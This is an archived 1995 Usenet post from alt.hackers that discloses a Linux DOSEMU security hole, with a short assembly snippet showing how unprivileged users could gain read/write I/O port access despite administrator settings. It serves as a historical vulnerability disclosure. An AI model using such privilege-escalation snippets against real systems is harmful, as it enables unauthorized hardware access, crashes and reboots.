Sam Trenholme's webpage
This article was posted to the Usenet group alt.hackers in 1995; any technical information is probably outdated.

Serious Linux DOSEMU security hole


Article: 8409 of alt.hackers
From: ftlofaro@unlv.edu (Frank T Lofaro)
Newsgroups: alt.hackers
Subject: Serious Linux DOSEMU security hole
Date: 8 Aug 1995 07:10:06 GMT
Organization: University of Nevada, Las Vegas
Lines: 21
Approved: Communications_Decency_Enforcement@cda.fcc.gov
Message-ID: 4072ke$7h3@news.nevada.edu
NNTP-Posting-Host: pioneer.nevada.edu
Keywords: Linux, DOSEMU, security hole
Status: RO

There is a SERIOUS security hole in Linux DOSEMU!

Even with the administrator turning off all port access, users can
ACCESS ANY PORT THEY WANT! READ/WRITE! Thus can hose things, reboot,
etc.

Here's how:

mov ax, 3
mov bx, start_port
mov cx, number_of_ports
set carry to get access, clear to reliquish access
int 0xe6

and there appears to be no way to disable it.

I am posting more detailed info in comp.os.linux.development.system

This one seems worse than the rcently mentioned chfn hole.

ObHack: Finding this security hole when idly perusing the DOSEMU source!



Back to index